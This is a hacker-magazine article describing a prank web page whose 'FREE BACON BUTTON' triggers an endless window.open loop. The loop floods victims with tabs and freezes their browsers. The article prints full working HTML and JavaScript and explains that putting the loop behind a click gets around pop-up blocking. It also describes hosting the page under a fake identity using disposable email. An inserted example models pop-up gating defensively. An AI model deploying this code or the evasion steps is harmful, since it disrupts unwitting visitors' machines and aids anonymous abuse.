Exploiting HTML - Making Your Browser a Vegetable

by Dent

Those I know in the 2600 community can vouch that although I love hacking, I am not always the most advanced user, so be prepared for some painfully simple code.

A few weeks ago, or perhaps months ago by the time you are reading this, I decided I wanted a fun way to troll some friends of mine.  Everyone knows all too well not to open shady looking programs unless you want your computer to be a playground for viruses.  But not too many people are aware that visiting shady websites, and more importantly interacting with them, can be pretty dangerous as well.  Although the examples I am giving today may not be super dangerous, they are made to show that interacting with websites can affect your browser temporarily.

What I first tried was making a website with a script that would constantly open a new website in a new tab, causing a constant flow of new tabs, or windows, to open - so many that you would not be able to close them faster than they opened.

The script looked a bit like this (inside of the HTML <script> tag):

function myFunction() {
  while (1 == 1) {
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
  }
}
myFunction();

If you have tried this on your browser, you can see clearly that nothing interesting has happened thus far other than a little window, perhaps, that says "pop-up blocked" (or something of that sort).  At least, this was the message displayed on my Firefox browser.

I then decided (through a couple dozen pages of forums with other people asking the same exact question) that I would have the script activate upon a button click.  This would completely bypass pop-up detection, as it was triggered upon user input.  I just needed something that would look very clickable.  What would look clickable?  Well, clearly a button with big bold letters stating "FREE BACON BUTTON" is all the rage nowadays.

My full HTML code looked as follows (scaled down for printing purposes):

<!DOCTYPE html>
<html>
<head>
<style>

body {
     background-image: url("somebaconimage.gif");
}

</style>
</head>
<body>

<button onclick="myFunction();">FREE BACON BUTTON</button>
<script>
function myFunction() {
  while (1 == 1) {
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
  }
}
</script>
</body>
</html>

As you can see, the code is cringingly simple: a button that activates a function.  What was more entertaining, however, was how my browser - and other browsers on different computers - reacted.

My Firefox browser, on my crappy Apple laptop, became completely unresponsive upon clicking my creatively decorated button.  This meant that if other people with other crappy laptops opened the link and were curious enough to click the button, all of their tabs would have to be sacrificed to reopen the browser, as well as the browser having to be forcibly quit.  I was not able to open a new tab, and eventually got the spinning beach ball of death, as many call it, on my Apple-made computer.

I then sent it to my friend sitting next to me to see what his more pristine computer would do.  It did what I originally expected.  On his screen was an infinitely expanding number of tabs.  He wittingly tried closing the tabs one-by-one, only to be greeted by a dozen more tabs opening at the same time.  Indeed, it was a vegetable of a browser.  What I did not expect, probably because of my lack of advanced browser knowledge, was that upon reopening the browser, the same tabs would open again.  The solution was to hold down Shift while opening the browser again.  I don't know if this applies to browsers other than the notorious Safari.
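
Added example (not part of the original article): a simplified JavaScript model of per-gesture pop-up gating, where one click is treated as permission for one window.open() call rather than for every call the click handler makes.  PopupGate, userGesture, requestOpen and replay are hypothetical names, the 5-second freshness window is an assumed value, and the article's endless loop is bounded to 500 calls so the replay terminates.

```javascript
// Simplified model of per-gesture popup gating (not any browser's source code).
// All names and the 5000 ms window are assumptions made for this example.
class PopupGate {
  constructor({ activationMs = 5000, now = () => Date.now() } = {}) {
    this.activationMs = activationMs; // how long a click stays "fresh"
    this.now = now;                   // injectable clock, useful for testing
    this.activatedAt = null;          // null means no unconsumed gesture
    this.log = [];                    // one verdict per attempted popup
  }

  // Called by the modelled browser when the user really clicks or types.
  userGesture() {
    this.activatedAt = this.now();
  }

  // Called for every window.open() the page attempts.
  requestOpen(url) {
    const fresh = this.activatedAt !== null &&
      this.now() - this.activatedAt <= this.activationMs;
    // Consume the gesture whether it was fresh or stale: one click, one try.
    this.activatedAt = null;
    this.log.push({ url, verdict: fresh ? "allowed" : "blocked" });
    return fresh;
  }
}

// Constructed replay of the article's page: `calls` popup attempts,
// optionally preceded by a single click on the button.
function replay(gate, { clicked, calls }) {
  if (clicked) gate.userGesture();
  let opened = 0;
  for (let i = 0; i < calls; i++) {
    if (gate.requestOpen("http://somewebsite.com")) opened++;
  }
  return opened;
}

// Compare the script run on page load with the script run from the button.
function demo() {
  return {
    onLoad: replay(new PopupGate(), { clicked: false, calls: 500 }),
    onClick: replay(new PopupGate(), { clicked: true, calls: 500 }),
  };
}

console.log(demo());
```

The gate only caps how many windows a click can open; it does nothing about the synchronous while loop itself, which still ties up the page's own thread.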

All I had to do at this point was find some free web hosting service and sign up with a fake identity and a temporary email to get my cute little HTML file online.  Many may be familiar with services like Mailinator or 10minutemail.  However, other websites are updating their intelligence.  When I tried using "sillytest123@mailinator.com", I was greeted with a warning saying something along the lines of "DOMAIN NOT ALLOWED."  After trying a different temporary email, I was getting my jimmies rustled once more.  The one temporary email address service that I found to work excellently and would recommend was temp-mail.org.  Not only did I have the option of making new emails, but they also came from different domains.

In conclusion, don't be silly and click links that you find on random websites from random users.  Ever heard of "stranger danger?"  Even more important, do not click on big fancy buttons.  It is extremely simple to set up a small website that will fill your browser with pornography, eons of new tabs, and jump scares.

For more online safety tips and anti-tracking/pop-up tools, you can visit:
